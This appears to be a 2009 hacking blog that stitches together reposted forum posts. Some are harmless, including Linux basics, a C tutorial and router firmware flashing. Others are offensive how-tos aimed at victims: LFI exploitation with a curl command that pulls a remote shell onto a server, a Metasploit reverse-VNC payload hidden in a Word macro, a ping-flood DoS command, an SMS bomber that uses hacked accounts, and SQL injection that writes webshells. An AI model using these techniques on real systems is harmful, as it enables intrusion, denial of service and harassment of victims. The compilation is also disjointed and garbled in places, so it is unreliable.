When opening a shell, your will be logged in with your active account to your home directory (this is usually in /home/user_name).

check --> that every command has lots of options available. To see all the manual pages for the specific command, simply type "man ". It is important to understand that under Linux operating systems, commands are case-sensitive. This means that "A" is different from "a".

then go thorough files sys .... use:

- pwd - Prints out on the screen the working directory (eg /etc/ssh)
- cd - changes directory (eg cd .. - goes up one dir; cd etc - enters /etc dir)
- ls - lists the content of the directory
- mkdir - creates a new directory (mkdir dir_name)
- touch - creates a new file (touch file_name)
- rmdir - removes a directory (rmdir dir_name)
- cp - copies a file/directory (cp source_file destination_file)
- mv - moves a file/directory - also used for renaming a file or directory (mv old_location new_location or mv old_name new_name)
- rm - removes files (rm file_name)

To search a file, you can use

- find (used for filenames)
- grep
To view a file, you can use

- more - will display a file page by page
- cat - displays all the file
- head - displays the first lines
- tail - displays the last lines (useful for example when you want to view the last information logged in a file by the system for example)

To edit a file you must use a built-in editor from the command-line. Generally, this is vi and it's used with the syntax vi .

To uncompress an archive (usually tar.gz) you must use the tar command with the syntax tar -xvzf .

To print a file, use lpr command. Note that you must have some daemons up and running to manage the printer. Usually this is cups (Common UNIX Printing System) that comes with all major distributions.
To remove a file from printer queue (you can list the queue with lpq command) you can use lprm .

To mount/unmount (add in your file system as accessible media) use:

- mount /mnt/floppy - to mount floppies
- umount /mnt/floppy - to unmount floppie
- mount /mnt/cdrom - to mount CD-ROMs
- mount /mnt/cdrom - to unmount CD-ROMs

They usually mount automatically, but you could end-up in the situation where you must do it manually.
To mount a partition:
First create a directory in /mnt (mkdir /mnt/my_new_drive) then use the mount command (mount /dev/source /mnt/my_new_drive) where /dev/source is the device (partition) you want to mount in your file system.

If you want to connect to a remote host, use the ssh command. The syntax is ssh .

System management:

- ps - shows the current processes running (useful: ps -A shows up all processes)
In the list obtained by using ps command you will see a PID number (Process identification).

This number is required to stop a service or application. Use kill to stop a task.

- top - works somehow like the Task manager in Windows. It shows up the system resources, the processes running, average load, etc. Useful is top
-d - sets up the refresh period. You can put any value from .1 (10 ms) to 100 (100 seconds) or even greater.

- uptime will display the system's uptime and the load average for that moment, 5 minutes and 15 minutes in the past.

Usually, the load average is calculated as the percent of system resources (processor, RAM, harddisk I/O, network load) used at that moment. 0.37 means that 37% was used. A greater value like 2.35 means that the system had to que some data because it should be 235% faster to compute all without problems. Anyhow, this can be different from distribution to distribution.

- free - will display information on system's memory

- ifconfig - view detailed information about your network interfaces; generally your ethernet network interface will be named eth0. You can also set up the network settings like IP address or so by using this command (see man ifconfig). If something goes wrong, you can also stop/start the interface by using ifconfig up/down

- passwd - enables you to change your password (passwd own_user or others if you are logged in as root)

- useradd - enables to add a new user (see man useradd)

Anywhere you are, you cand use the TAB key to autocomplete a filename or command. This will be usefull when getting used to the commands available. You can also hit up arrow and down arrow to scroll through the history of the commands you entered.
You can also use multiple command on one line. Let's say you want to create 3 directories at once. The syntax is mkdir dir1 ; mkdir dir2 ; mkdir dir3.
Another useful thing is the pipe command. You can get a command output through another. Eg: man mkdir | tail will display the last lines in the manual pages of the mkdir command.

If at anytime you are asked for the root account (the super-administrator of the system) you can login in temporary with it by using the su command. You should also include -l (su -l) parameter to switch the home folder and available commands too. Note that you will be prompted for a password too.

To exit the shell type exit or logout.

refrence:cyberterrorists.net

How to make a basic web browser.

2009-09-22T14:20:00.000-07:00

Step one.

Get visual basic 2008 here.

Create a new form, select web app.

Step two.

Create 5 buttons, a web browser, and a text box. Tidy it up, make it cool.

Step three

The coding! Ok first, the five buttons are: Go, refresh, back, forward, home and stop.

So for each buttons or what ever I give you the code, double click the object, and copy&paste the code I give. Let's do this!

Go button

WebBrowser1.Navigate(TextBox1.Text)

Home button

WebBrowser1.gohome()

Refresh button

WebBrowser1.Refresh()

Back button

WebBrowser1.GoBack

Forward button

WebBrowser1.GoForward

Stop button

WebBrowser1.Stop

Then press F5 and you're done! I hope this helped you! I might do another TuT on advanced browsers. Have fun!

reference:hackforums.

NASM - The Netwide Assembler description

2009-09-19T12:11:00.000-07:00

NASM - The Netwide Assembler is 80x86 assembler designed for portability and modularity.

NASM is an 80x86 assembler designed for portability and modularity. The project supports a range of object file formats including Linux a.out and ELF, COFF, Microsoft 16-bit OBJ and Win32. It will also output plain binary files.

Its syntax is designed to be simple and easy to understand, similar to Intel's but less complex. It supports Pentium, P6, MMX, 3DNow! and SSE opcodes, and has macro capability. It includes a disassembler as well.

The Netwide Assembler grew out of an idea on comp.lang.asm.x86 (or possibly alt.lang.asm - I forget which), which was essentially that there didn't seem to be a good free x86-series assembler around, and that maybe someone ought to write one.

- a86 is good, but not free, and in particular you don't get any 32-bit capability until you pay. It's DOS only, too.
- gas is free, and ports over DOS and Unix, but it's not very good, since it's designed to be a back end to gcc, which always feeds it correct code. So its error checking is minimal. Also, its syntax is horrible, from the point of view of anyone trying to actually write anything in it. Plus you can't write 16-bit code in it (properly).
- as86 is Minix- and Linux-specific, and (my version at least) doesn't seem to have much (or any) documentation.
- MASM isn't very good, and it's (was) expensive, and it runs only under DOS.
- TASM is better, but still strives for MASM compatibility, which means millions of directives and tons of red tape. And its syntax is essentially MASM's, with the contradictions and quirks that entails (although it sorts out some of those by means of Ideal mode). It's expensive too. And it's DOS-only.

So here, for your coding pleasure, is NASM. At present it's still in prototype stage - we don't promise that it can outperform any of these assemblers. But please, please send us bug reports, fixes, helpful information, and anything else you can get your hands on (and thanks to the many people who've done this already! You all know who you are), and we'll improve it out of all recognition. Again.

Installing NASM under Unix

Once you've obtained the Unix source archive for NASM, nasm-X.XX.tar.gz (where X.XX denotes the version number of NASM contained in the archive), unpack it into a directory such as /usr/local/src. The archive, when unpacked, will create its own subdirectory nasm-X.XX.

NASM is an auto-configuring package: once you've unpacked it, cd to the directory it's been unpacked into and type ./configure. This shell script will find the best C compiler to use for building NASM and set up Makefiles accordingly.

Once NASM has auto-configured, you can type make to build the nasm and ndisasm binaries, and then make install to install them in /usr/local/bin and install the man pages nasm.1 and ndisasm.1 in /usr/local/man/man1. Alternatively, you can give options such as --prefix to the configure script (see the file INSTALL for more details), or install the programs yourself.

NASM also comes with a set of utilities for handling the RDOFF custom object-file format, which are in the rdoff subdirectory of the NASM archive. You can build these with make rdf and install them with make rdf_install, if you want them.

If NASM fails to auto-configure, you may still be able to make it compile by using the fall-back Unix makefile Makefile.unx. Copy or rename that file to Makefile and try typing make. There is also a Makefile.unx file in the rdoff subdirectory.

What's New in This Release: [ read full changelog ]

· NASM is now under the 2-clause BSD license. See section 1.1.2.
· Fix the section type for the .strtab section in the elf64 output format.
· Fix the handling of COMMON directives in the obj output format.
· New ith and srec output formats; these are variants of the bin output format which output Intel hex and Motorola S-records, respectively. See section 7.2 and section 7.3.
· rdf2ihx replaced with an enhanced rdf2bin, which can output binary, COM, Intel hex or Motorola S-records.
· The Windows installer now puts the NASM directory first in the PATH of the "NASM Shell".
· Revert the early expansion behavior of %+ to pre-2.06 behavior: %+ is only expanded late.
· Yet another Mach-O alignment fix.
· Don't delete the list file on errors. Also, include error and warning information in the list file.
· Support for 64-bit Mach-O output, see section 7.8.
· Fix assert failure on certain operations that involve strings with high-bit bytes.

refrence:http://linux.softpedia.com/get/Programming/Compilers/NASM-The-Netwide-Assembler-643.shtml

What you can use LFI for???

2009-09-12T16:19:00.000-07:00

Allright, so i got this question often... Some guy got a LFI vuln some place but, what the fuck do i use it for?

Well, there is a few things you can do with it..

1. If /etc/passwd contains the user password on the system you can use ssh(assuming they got ssh and uses the users on the system as login) or if someone is a fucking idiot and make /etc/shadow readeble for anyone if /etc/passwd is just x'ed out... If on windows machine maybe you can include the SAM file? dunno..

2. You can try to include the error or access log and then telnet to the server and make it write php code to error or access log that way you can get a shell! Also if error eller access logg loggs user agent or other shit you can just browse the page with php in the useragent then include it

3. If its a shared host or a server with more pages on it you can try to find upload forms etc etc on the other pages hosted on the same server, then make a image containing php code inside it, then include it from the page you want to hack, that way getting shell access! You can ofc do this on the same domain to, if it got some kindof upload form, and it dosent need to be images, can be documents or pdf's, anything!

4. Finding config or other interesting files... Many idiots store their ftp and or ssh info in .txt or doc files outside the www dir, but if you got LFI you can include those anyway! Takes a bit time trying out file names and shit trouth xD Also .config files or config.php files can contain things like root mysqld info and that can lead to more interesting stuff! Also, maybe a page got a basic login system with reading from a config.php so you can get admin access on the page..

5. if its site and forum you can upload image with aribitary code then include and execute it..

6. You even can make it vnl to LFI
Code:

then
Code:

http://anything.org/index.php?action=../proc/self/environ?cmd=curlhttp://zero-thunder.com/mu.txt -o zero.php

and the shell will be up like this

Code:

http://anything.org/zero.php

7. or u can do something like this ..
if proc/self/environ is accessible you can
Code:

zero.php is the shell and the server will download
Code:

http://zero-thunder.com/mu.txt

and it will save it as zero.php and u will get something like this

Code:

http://anything.org/zero.php

reference:cyberterrorist

Metasploit: Reverse VNC hidden in a Word file

2009-09-12T13:56:00.000-07:00

Today i will show u how to use Metasploit payload feature for Reverse VNC connection which can be hidden in a Word file and get VNC desktop of the remote user

Metasploit will create a macro for Word, which once implemented when a user opens the word file we get a reverse VNC of the target system ,where the Word file contains the macro, even antvirus cant detect It,

there is no required of VNC installed in the Victim PC
u can also do this in WAN also only thing is u should port forward ur 4444 port in ur modem or router

Lets begin

1) Create a Macro to Intergate with word

./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.147.128 V > /tmp/punter.bas

2) copy that punter.bas file in windows now go to windows
and open ur office 2003 –>tools–>macro–>visualbasic editor
then go to File–>import file–> and choose the punter.bas and save it with a name ex: macrogame.doc
now send this file to victim via mail or some other technique for this demo i will open in my system

3)now in Backtrack type this command

./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.147.128 DisableCourtesyShell=True E

When the target on the windows open the file, it will be asked if he/she wished to accept or not run the macro, if it accepts, the connection will be initiated, and the VNC client will open on the post BackTrack.
not run the macro, if it accepts, the connection will be initiated, and the VNC client will open on the post BackTrack.

Video link for the above guide

http://blip.tv/file/1847504

http://wirelesspunter.blip.tv

reference:darkc0de

SMS Bomber by AlphaDog

2009-09-08T23:50:00.000-07:00

SMS Bomber by AlphaDog

-Spams Cell Phones With Text Messages (SMS Bombing)

-Use

1.Select a smtp server & Port, The givin smtp svr and prt is for Gmail accounts
SMTP is the incoming and outgoing connection w/e this uses out going, smtp is used for every mailing system.

2.Type in the account information , email info / email and pass , if you don't want to use your account just select one of the ready hacked ones ..

3.Fill :
-Victims cell number
-How many to spam
-Provider

4.Type in message

5.Start Tongue

*Note that this program may harm your PC if you have CPU like Pentium 3 or older ...

so that's about it ... as you see its 1.0 so there will be updates .. i will try to imput providers providers from Macedonia and 2-3 other countries.

DOWNLOAD:
Code:

http://rapidshare.com/files/277283168/AlphaDog_SMS_Bomber.rar.html

Enjoy......................

refrence:evilzone

How To Send DoS Attack With CMD

2009-09-08T07:10:00.000-07:00

Q: what is dos ??
A: Denial of Service (DoS) attackes are aggressive attacks on an individual Computer or WebSite with intent to deny services to intended users.
DoS attackes can target end-user systems, servers, routers and Network links(websites)

Requirments:
1- Command Prompt (CMD or DOS) Which is usually integrated in all Windows.
2- Ip-Address of Targeted Site.

How TO GET IP OF ANY SITE??"
No problem.. here is the solution..
open ur CMD (command prompt).. and type

ping www.yoursitename.com

or

nslookup yoursite .com

It will show u ip of the site.

ohk now write this command in CMD For Attack on Any Site/ Server..

------> ping SITE-IP -l 65500 -n 10000000 -w 0.00001 <------

Here -n 10000000= the number of DoS attemps.. u can change the value "10000000" with ur desired value u want to attempt attack.

SITE-IP= Replace the text with the ip address of the site u want to be attacked..

-w 0.00001 = It is the waiting time after one ping attack.

NOTE: Dont Change or Remove -l, -n and -w in this command.. otherwise u will not able to attack!!

reference:cyberterorist forum..

URL Dumper V.2 BIN and Source Code!

2009-09-01T23:02:00.001-07:00

URL Dumper is an Online scanner coded by me with VB.NET in the last years ago..
Used too get XSS and SQL Injections vulns.. supports multi search engine, trash system, etc..

Features:
-Get all page links by advanced technique with regular expression;
-XSS Scanner (auto check all page links);
-SQLInjection Scanner (auto check all page links);
-Multi-Thread engine;
-Get many links by search (google/Yahoo/Live Search/Altavista/Terravista)
-Search in the page source by regular expression;
-View Source (Code/Browser);
-Trash system
-Database in SQLite to organize the URL’s
-Enabled Proxy server
-Etc..

Coded by me with vb.net 2008

Screen Shot:

Download BIN:
Download SRC:
Tags: URL Dump oficial blog URL Dumper URL Dumper Source Code for free URL Dumper v.2 XSS and SQL Injection scanner;free tool

reference:http://flash.i.ph/blogs/flash/2009/01/20/url-dumper-v2/

Slackware 13.0 Officially Supported on x86_64 Processors

2009-09-01T06:51:00.000-07:00

After a long wait, Slackware fans are finally able to rejoice, as Patrick J. Volkerding announced late yesterday that Slackware 13.0 was available at last. The changes definitely warrant the major version bump, since this release has a number of unique features that its predecessor wasn't capable of, like running natively on 64-bit processors, improved X Window System that doesn't require an xorg.conf file and a massively overhauled set of build scripts.

Volkerding's enthusiasm about this release is visible in his announcement: "Yes it's that time again! After many months of development and careful testing, we are proud to announce the release of Slackware version 13.0! We are sure you'll agree that the improvements made in this release more than warrant the major version bump up from the 12.x series. We've done our best to bring the latest technology to Slackware while still maintaining the stability and security that you have come to expect."

The low-level functions are provided by the Linux kernel, version 2.6.29.6, which makes the system faster and includes support for the X Direct Rendering Interface that enables the display of hardware accelerated 3D graphics. Also, the kernel is patched to support speech synthesizers, a very useful function for the visually impaired users. A core change since Slackware 12.2 is that some devices, like network hardware, are now initialized at install time, and the new udev scripts are tweaked to give normal users a seamless experience when managing their devices.

On top of that kernel you can have by default one of the two supported desktop environments: KDE 4.2.4 or Xfce 4.6.1. GNOME fans won't feel totally stranded, as Pidgin 2.5.9, Gimp-2.6.6 and xChat 2.8.6 are included. The other applications are what you would expect from a modern operating system, with Firefox 3.5.2 on board, as well as Thunderbird 2.0.0.23. Programmers will surely enjoy the new development tools, like Perl 5.10.0, Python 2.6.2, Ruby 1.8.7-p174, Subversion 1.6.4, Git 1.6.4, Mercurial 1.2.1.

Download Slackware 13.0 right now from Softpedia.

Wardriving tools

2009-08-29T01:22:00.000-07:00

The Cain & Abel:

http://www.softmania.pl/program-1807-cain_abel.html#m

The AirSnort:

http://www.softmania.pl/program-1806-airsnort.html#m

The Wireshark:

http://www.softmania.pl/program-1811-wireshark.html#m

The AirCrack 1.0 (Windows & Linux):

http://download.aircrack-ng.org/

The AirPcap:

http://www.softmania.pl/program-1813-airpcap_driver.html#m

The WinPcap:

http://www.softmania.pl/program-1810-winpcap.html#m

The Net Stumbler:

http://www.softmania.pl/program-1809-netstumbler.html#

m

The AirTraf:

http://www.elixar.com/corporate/history/airtraf-1.0/airtraf_download.php

The Kismet:

http://www.idg.pl/ftp/linux_740/Kismet.2005.06.R1.html

The AirJack:

http://sourceforge.net/projects/airjack/

The AiroMap:

http://handheld.softpedia.com/get/GPS/AiroMap-60181.shtml

The WiFi Hopper:

http://wifihopper.com/

The WepCrack:

http://sourceforge.net/projects/wepcrack/

The WirelessMon:

http://www.passmark.com/products/wirelessmonitor.htm

download the tools for makin better

C tutorial [Chapter 1]

2009-08-22T16:58:00.000-07:00

[Introduction]
The purpose of this tutorial is to learn how to use C with some of its best features like pointers, process and thread creation, semaphores and signal handling. Of course to learn how to do all this we need to start from the beginning.
This is not a basic programming tutorial. If you don't know how the art of programming works this is not a tutorial for you. C is a very complex language if you are a beginner. Try Python or even Java if you want to start with something easy then you will be prepared to learn this awesome language.
I love Linux. Linux loves C. I don't know if any of the techniques exposed here work in a Windows machine... I really don't care if they work... Linux is a very efficient OS. I won't explain why, but in the references below, you will find the book that explains why any Unix based system is better than any flavor of Windows.

[In the beginning there was darkness]
Lets learn some syntax first:

Variable types

int: Integer
char: Character
float: Float
char* or char[]: Strings

Among others...

Assignment

int intName = 10;
char charName = 48; // "0"
char* str1Name = "Hello World";

IF-ELSE IF-ELSE statements

if(condition1){
Instructions
}else if(condition2){
Instructions
...
}else if(conditionN){
Instructions
}else{
Instructions
}

Switch statements
Faster than If statements

switch(condition){
case 1:
Instructions
break;
...
case N:
Instructions
break;
default:
Instructions
}

Loops
While loop

while(condition){
Instructions
}

For Loop

int i;
for(i=0; condition; i++){
Instructions
}

Do-While Loop

do{
Instructions
}while(condition);

Useful functions
Search in the man pages of your Linux distribution how to use them. In Debian you have to install them from the repositories.

apt-get install manpages-dev

The functions you should man for now are:
printf
scanf
strlen
strcpy
strcat
malloc
free

Pointer
The beautiful pointers... Thanks to them we have Orient Object Programming.
Let's say this is our memory (All numbers in Hex with a Little-Endian 32 bits hardware):

Endianness -> http://en.wikipedia.org/wiki/Endianness

-----------------------------
Address | Memory |
-----------------------------
0x00 | 00 | 00 | 00 | 0A |
-----------------------------
0x04 | 00 | 00 | 00 | 00 |
-----------------------------
0x08 | 4C | 4C | 45 | 48 |
-----------------------------
0x0C | 00 | 00 | 00 | 4F |
-----------------------------

Also lets say our program is:

int a = 10; //Address 0x00
int* b = &a; //Address 0x04
char* c = "HELLO"; //Address 0x08

b is a pointer. If I print b I will get 0x00000000
which is the address of a. If I print *b I will print
the value of the thing b is pointing, in this case a.
So printing *b will result in 0x0000000A or 10
If I print &a I will get the address of a which is 0x00000000

Now if I print c[2] I will get 4C which is L in the ascii table.
If I print all the string, it will print till it gets to the null byte
In this case the null byte is in the sixth byte of the string.

Now you know how to get the information of a pointer :)
To reserve memory use the function malloc like this:

char* str;
int* i;
/*
* To reserve 10 bytes for str. The (char *)
* is for the program to know what kind of
* pointer will be.
*/
str = (char *)malloc(10);
/*
* To reserve enough space for a int I use the
* sizeof function.
*/
i = (int *)malloc(sizeof(int));

Precompiler Instructions
This are special instructions. All the calculations are made by the compiler, but make us the life easier.
Include precompiler instruction
It's to import the libraries you want to use in your program.
For system libraries:

#include //This will include the stdio.h file

.

For user defined libraries:

#include "list.h"//This will include the lis.h file.

efine precompiler instruction
To define a constant:

#define TRUE 1//This will define the word TRUE as 1

The .h files are the headers files. There you'll have the firm of every function in the .c with the same name.

sum.h

#include

void printSum(int, int);

sum.c

#include "sum.h"

int sum( int a, int b ){
return ( a + b );
}

void printSum(int a, int b ){
printf("The result is %d", sum( a , b ));//Prints result on screen
}

As you can see, the the sum.h only have the printSum function. This is because printSum is a public function while sum is just a private function. If someone use this useless library will not be able to use sum, but will be able to use printSum. So to define a class you should to use a header file. But how do you define a new data type? With Structures :)

Structures
Let's say we want to define the data type Person (Name, Age, Gender)

person.h

#include
#include
#include

struct PERSON{
char* pName;
int pAge;
int pGender;//0 for man, 1 for woman
}

typedef struct PERSON Person;

Person* newPerson(char*, int, int);

person.c

#include "person.h"

//Constructor of Person. Returns NULL on error
Person* newPerson(char* name, int age, int gender){
/*
* To reserve some memory use malloc with the size you need
* In this case I need the space enough to hold a Person type
* so I use sizeof(Person);
*/
Person* nPerson = (Person *) malloc(sizeof(Person));
//To access the members of this class we should use the "->" operator.
if(gender != 0 && gender != 1){
free(nPerson);//To free the space used by nPerson
return NULL;
}
//To access the pGender, member of Person
nPerson->pGender = gender;
if(age<0){
free(nPerson);//To free the space used by nPerson
return NULL;
}
//To access the pAge, member of Person
nPerson->pAge = age;
/*
* With the function malloc I reserve as many bytes the char* name has and then
* and I assign the new address to the pName, member of Person. If the malloc
* return NULL the system call to ask some more memory failed, and the creation
* of the new type also should failed. It's efficient to free the space used for
* any reference data type if it won't be used anymore. That's why I use free(void*)
* everytime a inconsistent data or a failed system call appears.
*/
if((nPerson->pName = (char *) malloc(strlen(name)))==NULL){
free(nPerson);//To free the space used by nPerson
return NULL;
}
/*
* This function copies name to pName
* This nPerson->pName = name would only copie the
* address of name to nPerson->pName
*/
strcpy(nPerson->pName,name);
return nPerson;
}

You can also use "." intead of "->", but you need to change some things... I think is easier to work this way...

Explanation of the code:
Here I declare the members of the "class". In this case you have pName, pAge, pGender.

struct PERSON{
char* pName;
int pAge;
int pGender;
}

Here I rename the "class" from "struct PERSON" to "Person". It's just to write less code :)

typedef struct PERSON Person;

Then I declare the "constructor" of the "class"

Person* newPerson(char*, int, int);

reference:zeroidentity

Conficker??? real or fake

2009-08-21T15:46:00.001-07:00

Taken from thesun.co.uk

The Windows worm called Conficker could give a hacker unrestricted access to every infected machine on the planet.
And the aggressive bug could be hiding on your PC at home right now, waiting to kick in.
For the hackers, it’s like having a virtual army at their fingertips.
The criminals behind it have the power to launch a tidal wave of junk emails, bringing computers grinding to a halt.
They could also plunder information, including your bank details.
But the truth is that the best techie brains in the business just don’t know exactly what the hackers have in mind.
Infected

Virus expert Mikko Hypponen, from the firm F-Secure, said: “It is scary thinking about how much control a hacker could have over all these computers. They would have access to millions of machines.”
Microsoft, who developed the Windows computer operating system, have slapped a £175,000 bounty on whoever is responsible, so far without success.
The sophisticated Conficker bug — also known as Downadup or Kido — targets systems via the web and can be spread on memory sticks.
More than nine million computers were infected at the bug’s peak last month.
And if Conficker is still on your system come Wednesday, you could be in trouble.
Once inside your PC, it sets up files and starts downloading information from a controlling “boss” server.
Finding that website and the mastermind behind it all is like looking for a needle in a haystack.
That is because the bug creates hundreds of bogus addresses every day to put investigators off the scent.
The infected PCs then form a network and “talk” to each other, updating and evolving.
The bug even attacks anti-virus software and other files on your computer to strengthen its position.
And it resets “restore” points, making recovery of your old system even harder.

The first of three Conficker strains was discovered in November last year.
A second, more aggressive strain followed in December and a third this month. This contains the all-important April 1 trigger.

To avoid infection, Windows users must download a special free update “patch” from the Microsoft website. But that isn’t enough — you also need good anti-virus software too.
Many businesses around the world are thought also to be at risk after failing to update systems.
Graham Cluley, from computer security firm Sophos, warned: “Microsoft did a good job of updating people’s home computers.
“But the virus continues to infect businesses that have ignored the update.”
He also stressed the need for strong passwords on your computer, adding: “If users are using weak passwords — 12345, QWERTY etc — then the virus can crack them.”
F-Secure’s Mikko warned potential problems with Conficker would be highlighted wildly before April 1.
But he said he didn’t foresee an attack, despite the fears and mystery surrounding the problem.
He said: “There’s always hype — just think of previous cases.
“There is not going to be a ‘global virus attack’. We don’t know what they are planning to do, if anything.
“I think the machines that are already infected might do something new on April 1.”
Let’s hope, for everyone’s sake, that it turns out to be an April Fools’ Day hoax.

What M$ have to say about it:
Win32/Conficker.D is a variant of Win32/Conficker. Conficker.D infects the local computer, terminates services and blocks access to numerous Web sites. This variant does not spread to removable drives or shared folders across a network and is installed by previous variants of Win32/Conficker.

Other variants of Win32/Conficker infect computers across a network by exploiting a vulnerability in the Windows Server service (SVCHOST.EXE). If the vulnerability is successfully exploited, it could allow remote code execution when file sharing is enabled. It may also spread via removable drives and weak administrator passwords. It disables several important system services and security products.

Microsoft strongly recommends that users apply the update referred to in Security Bulletin MS08-067 immediately.

Microsoft also recommends that users ensure that their network passwords are strong to prevent Win32/Conficker variants from spreading via weak administrator passwords.

Hack your router! Get better wireless range!

2009-08-16T11:22:00.000-07:00

Ever wanted to control the access times that others can use your internet or see if your neighbors are leaching off your wifi? Tired of the shitty web interface on your router? got nothing better to do? Well dd-wrt is for you.

dd-wrt is a linux based, open source firmware for your router, adding many features such as remote access, bandwidth management, and as I mentioned the ability to kick your siblings off of limewire to free up bandwidth.

Sound awesome? It is. Before you get all excited, check and make sure your router is compatible with dd-wrt.

http://www.dd-wrt.com/dd-wrtv3/dd-wrt/hardware.html

If it is, keep reading, if its not, sucks to be you and gtfo

THIS GUIDE IS FOR THE WEB INSTALL ONLY! VISIT dd-wrt.com FOR TFTP INSTALL

Things your going to need

*about an hours worth of time or less, depending on your IQ
*compatible router
*linux, windows xp or vista
*network cable

First off, download dd-wrt.
http://www.dd-wrt.com/dd-wrtv3/dd-wrt/downloads.html
choose who v24 sp 1, then click consumer, and find who makes your router. THEN click on its model number. from there, download the file

dd-wrt.v24_mini_generic.bin

and keep it on your desktop.

Now its time to get your hands dirty with installing.

***************WARNING READ THIS******************
Incorrectly flashing will brick (break) your router! If your a 12 year old regular scriptkiddie on here, DONT DO THIS UNLESS YOU CAN REPLACE YOUR ROUTER.

You have been warned, dont bitch at me if you mess up.

Fist off, open firefox (yes firefox, if your using internet explorer you need to switch now) and go to http://192.168.1.1/. WHATS THIS A WEB PAGE? No, this is your router on your local network. If you get a blank page, your router may have a different IP address than the normal which I just posted.

TO FIND OUT YOUR ROUTER IP, (on windows)
Click start > run and type in cmd
in the command prompt, type ipconfig
you should see the following:

AND THIS BLOCK OF TEXT IS TAKEN FROM DD-WRT.COM
If you know the IP address, username, and password of your router:

1. Follow the instructions in the next section to log in to the Web GUI.
2. Click the "Administration" tab.
3. Click the "Factory Defaults" sub-tab.
4. Select "Yes".
5. Click the "Save Settings" button.
6. A new page will open, click "continue".

If you do not know the IP address, username, or password of your router, read above or LEARN TO READ I CANT SPOON FEED YOU ANY MORE.

and now back to my guide.

This will clear all settings on your router... setting the stage for dd-wrt.

Now its time to do a 30/30/30 reset. While the router is plugged in, hold the reset button for 30 seconds. while still holding the reset button, unplug the unit for 30 second and plug it back in, whilest still holding the reset button, for another 30 seconds while the unit is running.

in other words, HOLD THE BUTTON FOR 1 minute 30 seconds while unplugging the router and plugging it back in.

The stage is now set to upload the dd-wrt firmware.

*******************FINAL BLUNT WARNING*****************
FUCKING UP WILL BREAK YOUR ROUTER IF YOU HAVE A LOW IQ DO NOT CONTINUE
****************************************************

following text taken from dd-wrt.com
1. First do a hard reset on the unit that DD-WRT is to be loaded onto. 2. You should be in the Web GUI of the router. Go there now. (192.168.1.1 in your web browser)
3. Click the "Administration" tab
4. Click the "Firmware Upgrade" sub-tab.
5.
6. Click the "Browse" button and select the DD-WRT .bin file you downloaded and confirmed. (file is dd-wrt.v24_mini_generic.bin on your desktop)
7. Click the "Upgrade" button.
8. The router will take a few minutes to upload the file and flash the firmware. During this time, the power light will flash.
9. A new page will open confirming that the upload was successful (Installation#Possible errors if not). Now wait about 5 minutes before clicking "Continue".
10. Lastly, do another hard reset on the unit. (same thing as above, 30/30/30 reset)
11. If flashed successfully you will now be able to access the DD-WRT web interface at 192.168.1.1

END OF COPIED TEXT

12. If you cant access the web interface at 192.168.1.1, your pretty bone now arent you? (in other words, your router is probly bricked Roflmao)

Go ahead and play with your new firmware. Turn up the power on your antennas to 52 mw (NOT PAST 52 UNLESS YOU WANT A FIRE AND OR BURNT HARDWARE)

More copied text from dd-wrt.com, if you had an "upload failed" error. I allready told you to use the generic version of the firmware anywho, so your probably just thick.

Possible Errors

During the firmware upload process, if your router says something similar to, "Upload Failed," you may be using the wrong version of DD-WRT. This may occur through the web GUI if you use a *wrt54g.bin version when you should have selected the generic version instead. It may also be that your router requires the mini version to be flashed before the full version. Be sure to double check to make sure you have the right version. If you are certain that your router is supported and that you have the correct firmware, you may simply need to use a different web browser (e.g. from Firefox to Internet Explorer).

END OF COPIED TEXT

and thats it for my guide. You can explore dd-wrt and play with its features yourself. If you have any problems during install, LOOK AT THEIR GODDAMNED GUIDE at http://www.dd-wrt.com/wiki/index.php/Installation

This is a watered down, spoon fed version of it. I cant make it any easier than it is allready. Blunt, simple, and to the point.

rep me if you think its a decent guide.

questions or comments? Post here, dont even think about pm'ing me with trivial questions covered on dd-wrt.com or in my guide.

good luck and dont brick your router!

reference: das pacman@hackforums

Backdoor webserver using MySQL SQL Injection

2009-08-13T21:15:00.000-07:00

MySQL Database is a great product used by thousand of websites. Various web applications use MySQL as their default database. Some of these applications are written with security in mind, and some are not. In this article, I would like to show you how you can exploit SQL injection in order to gain almost full control over your webserver.

Most people know that SQL injection allows attackers to retrieve database records, pass login screens, change database content, through the creation of new administrative users. MySQL does not have a built-in command to execute shell commands, like Microsoft SQL server. I will show you how to run arbitrary commands using standard features provided by MySQL.

First of all, I would like to give a brief description of SQL injection, then I would like to present you with a couple less known methods that exist in MySQL, which I will use to backdoor a webserver. I will use 2 built-in MySQL commands - one that writes arbitrary files and the one that can be used to read arbitrary files. After that I will describe webshells and go to the attack itself.
What is SQL Injection?

SQL injection is an attack that allows the attacker to add logical expressions and additional commands to the existing SQL query. This attack can succeed whenever a user has submitted data that is not properly validated and is glued together with a legitimate SQL query.

For example, the following SQL command is used to validate user login requests:

$sql_query = "select * from users where user='$user' and password='$pass'"

If the user-submitted data is not properly validated, an attacker can exploit this query and pass the login screen by simply submitting specially crafter variables. For example, attacker can submit the following data as a $user variable: admin' or '1'='1 . When this $user variable is glued together with the query, it will look as followed:

$sql_query = "select * from users where user='admin' or '1'='1' and password='$pass'"

Now, the attacker can safely pass the login screen because or '1'='1' causes the query to always return a "true" value while ignoring the password value.

Using similar techniques, an attacker can retrieve database records, pass login screens, and change database contents, for example by creating new administrative users. In this document, I will show how by applying similar techniques, we will be able to execute arbitrary shell commands.
Command 1- Writing arbitrary files

MySQL has a built-in command that can be used to create and write system files. This command has the following format:

mysq> select "text" INTO OUTFILE "file.txt"

One big drawback of this command is that it can be appended to an existing query using UNION SQL token.

For example, it can be appended to the following query:
select user, password from user where user="admin" and password='123'

Resulting query:
select user, password from user where user="admin" and password='123' union
select "text",2 into outfile "/tmp/file.txt" -- '

As a result of the above command, the /tmp/file.txt file will be created including the query result.
Command 2- Reading arbitrary files

MySQL has a built-in command that can be used to read arbitrary files. The syntax is very simple. We will use this command for plan B.

mysql> select load_file("PATH_TO_FILE");
Webshell

Webshell is a polpular and widely used tool for executing shell commands from within the web browser. Some call these tools PHP shells. We will create a very simple webshell that will execute shell commands.

Here is the code of a very basic PHP shell (parameter passed by cmd will be executed):

For example, in the following screenshot, id command is executed.

Attack Scenario

1. Find SQL injection

It is out of the scope of this document. You must first find SQL injection.

2. Find a directory with write permission

To create a webshell PHP script, we need a directory with write permission on. Temporary directories used by popular Content Management Systems are a good choice for this. Check the following urls to find one:

* hxxp://www.target.com/templates_compiled/
* hxxp://www.target.com/templates_c/
* hxxp://www.target.com/templates/
* hxxp://www.target.com/temporary/
* hxxp://www.target.com/images/
* hxxp://www.target.com/cache/
